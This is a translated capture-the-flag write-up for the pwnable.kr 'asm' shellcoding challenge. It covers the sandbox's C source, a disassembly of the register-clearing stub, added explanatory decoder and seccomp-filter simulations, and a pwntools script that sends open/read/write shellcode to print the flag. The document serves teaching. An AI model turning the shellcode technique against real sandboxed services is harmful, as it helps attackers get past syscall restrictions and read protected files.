In my view this challenge mainly tests two things: which functions are still usable inside the sandbox, and the big topic of shellcode itself.
First, let's look at the challenge's code:
```
root@kali:~# ssh asm@pwnable.kr -p2222
asm@pwnable.kr's password:
[pwnable.kr ASCII-art banner]
 - Site admin : daehee87.kr@gmail.com
 - IRC : irc.netgarage.org:6667 / #pwnable.kr
 - Simply type "irssi" command to join IRC now
 - files under /tmp can be erased anytime. make your directory under /tmp
 - to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Sun Jul 22 23:03:43 2018 from 180.139.99.191
asm@ubuntu:~$ ls -al
total 48
drwxr-x---  5 root asm   4096 Jan  2  2017 .
drwxr-xr-x 87 root root  4096 Dec 27  2017 ..
d---------  2 root root  4096 Nov 19  2016 .bash_history
dr-xr-xr-x  2 root root  4096 Nov 25  2016 .irssi
drwxr-xr-x  2 root root  4096 Jan  2  2017 .pwntools-cache
-rwxr-xr-x  1 root root 13704 Nov 29  2016 asm
-rw-r--r--  1 root root  1793 Nov 29  2016 asm.c
-rw-r--r--  1 root root   211 Nov 19  2016 readme
-rw-r--r--  1 root root    67 Nov 19  2016 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
asm@ubuntu:~$ cat asm.c
```

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>

#define LENGTH 128

void sandbox(){
    /* default action: kill the process on any syscall not explicitly allowed */
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);
    if (ctx == NULL) {
        printf("seccomp error\n");
        exit(0);
    }

    /* the only five syscalls the shellcode may issue */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

    if (seccomp_load(ctx) < 0){
        seccomp_release(ctx);
        printf("seccomp error\n");
        exit(0);
    }
    seccomp_release(ctx);
}

/* prologue prepended to the user's shellcode: zeroes the general-purpose registers */
char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];

int main(int argc, char* argv[]){
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stdin, 0, _IOLBF, 0);

    printf("Welcome to shellcoding practice challenge.\n");
    printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
    printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
    printf("If this does not challenge you. you should play 'asg' challenge :)\n");

    /* RWX page at a fixed address, filled with NOPs, stub first, then the user's bytes */
    char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
    memset(sh, 0x90, 0x1000);
    memcpy(sh, stub, strlen(stub));
    int offset = sizeof(stub);

    printf("give me your x64 shellcode: ");
    read(0, sh+offset, 1000);

    alarm(10);
    chroot("/home/asm_pwn");   // you are in chroot jail. so you can't use symlink in /tmp
    sandbox();
    ((void (*)(void))sh)();
    return 0;
}
```
Next, `char stub[]` is obviously a shellcode-style byte string, so let's inspect it with Python:

```
root@kali:~# python
Python 2.7.13 (default, Jan 19 2017, 14:48:08)
[GCC 6.3.0 20170118] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> print disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff")
   0:   48                      dec    eax
   1:   31 c0                   xor    eax,eax
   3:   48                      dec    eax
   4:   31 db                   xor    ebx,ebx
   6:   48                      dec    eax
   7:   31 c9                   xor    ecx,ecx
   9:   48                      dec    eax
   a:   31 d2                   xor    edx,edx
   c:   48                      dec    eax
   d:   31 f6                   xor    esi,esi
   f:   48                      dec    eax
  10:   31 ff                   xor    edi,edi
  12:   48                      dec    eax
  13:   31 ed                   xor    ebp,ebp
  15:   4d                      dec    ebp
  16:   31 c0                   xor    eax,eax
  18:   4d                      dec    ebp
  19:   31 c9                   xor    ecx,ecx
  1b:   4d                      dec    ebp
  1c:   31 d2                   xor    edx,edx
  1e:   4d                      dec    ebp
  1f:   31 db                   xor    ebx,ebx
  21:   4d                      dec    ebp
  22:   31 e4                   xor    esp,esp
  24:   4d                      dec    ebp
  25:   31 ed                   xor    ebp,ebp
  27:   4d                      dec    ebp
  28:   31 f6                   xor    esi,esi
  2a:   4d                      dec    ebp
  2b:   31 ff                   xor    edi,edi
>>>
```
Reading this takes some assembly background. Once you work through it, the code's only job is to zero all the registers, which has no effect on executing our shellcode, so we can ignore it.
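One caveat a careful reader will notice: the session above shows `dec eax` / `dec ebp` before every `xor`, because pwntools' `disasm()` defaults to i386 when `context.arch` is not set. In 64-bit mode the bytes 0x48 and 0x4d are REX prefixes, so each three-byte group is a single `xor rax,rax`, `xor rbx,rbx`, ... `xor r15,r15`. The following added example (not from the original post, and not pwntools code) decodes the stub with a tiny hand-written x86-64 decoder for the register form of `xor` so the REX handling is visible, and it also shows what a 32-bit decoder makes of the same prefix bytes. `STUB` is the byte string from asm.c written as hex; the function names are mine.

```python
# Bytes of char stub[] from asm.c, copied from the page and written as hex.
STUB = bytes.fromhex(
    "4831c0" "4831db" "4831c9" "4831d2" "4831f6" "4831ff" "4831ed"
    "4d31c0" "4d31c9" "4d31d2" "4d31db" "4d31e4" "4d31ed" "4d31f6" "4d31ff"
)

# Register names indexed by the 4-bit register number (REX bit + ModRM field).
REGS64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
          "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"] + \
         ["r%dd" % i for i in range(8, 16)]


def decode_xor(code, pos):
    """Decode one `xor r/m, r` (opcode 0x31, register form) at `pos` in 64-bit mode.

    Returns ((dst, src), next_pos). An optional REX prefix (0x40-0x4F) may precede
    the opcode: REX.W selects 64-bit operands, REX.R and REX.B extend the ModRM
    reg and rm fields so that r8-r15 become addressable.
    """
    rex = 0
    if 0x40 <= code[pos] <= 0x4F:
        rex = code[pos]
        pos += 1
    if code[pos] != 0x31:
        raise ValueError("not a xor at offset %d" % pos)
    modrm = code[pos + 1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod != 3:
        raise ValueError("memory operand at offset %d; only register forms handled" % pos)
    rex_w, rex_r, rex_b = (rex >> 3) & 1, (rex >> 2) & 1, rex & 1
    names = REGS64 if rex_w else REGS32
    dst = names[rm | (rex_b << 3)]
    src = names[reg | (rex_r << 3)]
    return (dst, src), pos + 2


def decode_stub(code):
    """Decode a run of xor instructions into (dst, src) operand pairs."""
    out, pos = [], 0
    while pos < len(code):
        ins, pos = decode_xor(code, pos)
        out.append(ins)
    return out


def zeroed_registers(code):
    """Registers the stub zeroes: every `xor r, r` whose two operands match."""
    return [dst for dst, src in decode_stub(code) if dst == src]


def i386_view_of_prefix(byte):
    """What a 32-bit disassembler makes of a REX byte: 0x40+r is `inc r32`,
    0x48+r is `dec r32`. This is why the i386 disasm() output shows a stray
    `dec eax` (0x48) or `dec ebp` (0x4d) in front of every xor."""
    if 0x40 <= byte <= 0x47:
        return "inc " + REGS32[byte - 0x40]
    if 0x48 <= byte <= 0x4F:
        return "dec " + REGS32[byte - 0x48]
    raise ValueError("0x%02x is not an i386 inc/dec opcode" % byte)


if __name__ == "__main__":
    for dst, src in decode_stub(STUB):
        print("xor %s, %s" % (dst, src))
    print("zeroed:", ", ".join(zeroed_registers(STUB)))
    print("0x48 as i386:", i386_view_of_prefix(0x48))
    print("0x4d as i386:", i386_view_of_prefix(0x4d))
```

Decoded this way the stub clears fifteen registers: rax, rbx, rcx, rdx, rsi, rdi, rbp and r8 through r15. The one general-purpose register it leaves alone is rsp, which is exactly why the exploit script can use `rsp` as its read/write buffer.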
Now, which functions can be used inside the sandbox. The sandbox blocks most of them, so only four remain: read, write, open and exit. The plan for this challenge is therefore to open the flag with open, read it with read, and write it to stdout with write. (One more thing: always read the hint a challenge gives you. It is usually the tip you need, or the port and environment you have to connect to. Other CTF challenges give hints of some kind too, so always read them; you may be able to solve a challenge without the hint, but with it you will certainly solve it faster. I'm wandering off topic... back to it.)
As usual, here is the script first, followed by the analysis:
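To see how the sandbox actually enforces that list, here is an added example (mine, not code from the post or from libseccomp) that builds the same allow-list as `sandbox()` in asm.c as a raw classic-BPF seccomp program and evaluates it offline against a hand-packed `struct seccomp_data`. It goes slightly beyond the post: libseccomp emits an architecture check before the syscall-number comparisons, and the program below mirrors that so the effect is visible. The opcode values, audit-arch constants, return values and x86-64 syscall numbers are real kernel values; the function names and the probe syscalls are my choices.

```python
import struct

# Classic-BPF opcodes used by seccomp filters (values from <linux/bpf_common.h>).
BPF_LD_W_ABS = 0x20    # A = *(u32 *)(seccomp_data + k)
BPF_JMP_JEQ_K = 0x15   # pc += 1 + (jt if A == k else jf)
BPF_RET_K = 0x06       # return k

AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003
SECCOMP_RET_KILL = 0x00000000     # what SCMP_ACT_KILL becomes
SECCOMP_RET_ALLOW = 0x7FFF0000    # what SCMP_ACT_ALLOW becomes

# x86-64 syscall numbers: the five asm.c allows, plus a few to probe with.
SYSCALLS_X86_64 = {"read": 0, "write": 1, "open": 2, "mmap": 9, "execve": 59,
                   "exit": 60, "exit_group": 231, "openat": 257}
ALLOWED = [SYSCALLS_X86_64[n] for n in ("open", "read", "write", "exit", "exit_group")]


def build_allowlist_filter(allowed, arch=AUDIT_ARCH_X86_64):
    """Classic-BPF program: kill unless the arch matches and nr is in `allowed`."""
    prog = [
        (BPF_LD_W_ABS, 0, 0, 4),              # A = seccomp_data.arch (offset 4)
        (BPF_JMP_JEQ_K, 1, 0, arch),          # right arch: skip the kill below
        (BPF_RET_K, 0, 0, SECCOMP_RET_KILL),
        (BPF_LD_W_ABS, 0, 0, 0),              # A = seccomp_data.nr (offset 0)
    ]
    n = len(allowed)
    for i, nr in enumerate(allowed):
        # On a match, skip the remaining JEQs and the RET KILL to land on RET ALLOW.
        prog.append((BPF_JMP_JEQ_K, n - i, 0, nr))
    prog.append((BPF_RET_K, 0, 0, SECCOMP_RET_KILL))   # default, as seccomp_init(SCMP_ACT_KILL)
    prog.append((BPF_RET_K, 0, 0, SECCOMP_RET_ALLOW))
    return prog


def pack_seccomp_data(nr, arch=AUDIT_ARCH_X86_64, ip=0, args=(0,) * 6):
    """Serialize struct seccomp_data the way the kernel hands it to the filter."""
    return struct.pack("<iIQ6Q", nr, arch, ip, *args)


def run_filter(prog, data):
    """Minimal interpreter for the three BPF instruction kinds used above."""
    acc, pc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        if code == BPF_LD_W_ABS:
            acc = struct.unpack_from("<I", data, k)[0]
            pc += 1
        elif code == BPF_JMP_JEQ_K:
            pc += 1 + (jt if acc == k else jf)
        elif code == BPF_RET_K:
            return k
        else:
            raise ValueError("unsupported BPF opcode 0x%02x" % code)
    raise ValueError("filter fell off the end of the program")


FILTER = build_allowlist_filter(ALLOWED)


def decide(nr, arch=AUDIT_ARCH_X86_64):
    """Action the sandbox takes for syscall `nr` issued through ABI `arch`."""
    ret = run_filter(FILTER, pack_seccomp_data(nr, arch))
    return "ALLOW" if ret == SECCOMP_RET_ALLOW else "KILL"


if __name__ == "__main__":
    for name, nr in sorted(SYSCALLS_X86_64.items(), key=lambda kv: kv[1]):
        print("%-11s nr=%3d -> %s" % (name, nr, decide(nr)))
    print("open via the 32-bit ABI -> %s" % decide(SYSCALLS_X86_64["open"], AUDIT_ARCH_I386))
```

Two things worth noticing from the output: `openat` (257) is killed even though `open` is allowed, so the shellcode has to issue the raw `open` syscall rather than anything that routes through glibc's wrapper; and the same number sent through the 32-bit ABI is killed by the arch check, which is the reason libseccomp always emits one and a hand-written filter should too.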
```python
#!/usr/bin/python
from pwn import *

# Credentials and the local port come from the challenge's readme.
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context(arch='amd64', os='linux')

# open() the flag, read() from the fd left in rax into the stack, write() it to stdout.
shellcode = ""
shellcode += shellcraft.open('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
#print shellcode

print p.recv()
p.send(asm(shellcode))
print p.recvline()
```
After so many challenges, parts one and two need no explanation. Some may ask how I found the remote port and the username: they are in the readme, which is exactly the hint.
Part three is the shellcode, and that is the hard part. As said above, the flag lives at this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong, so we simply open() it. read() then reads 100 bytes from the file descriptor held in rax into the buffer at rsp. For write(), recall that on Linux 0 is stdin, 1 is stdout and 2 is stderr, so write(1, 'rsp', 100) prints the contents of that buffer.
The remaining parts are easy to follow, and with that the challenge is solved. If recv(), recvline() and the like are unfamiliar, look them up on Baidu.
Finally
That is everything 欢呼钢笔 has recently collected and compiled on pwnable.kr asm; for more on pwnable, search the other articles on 靠谱客.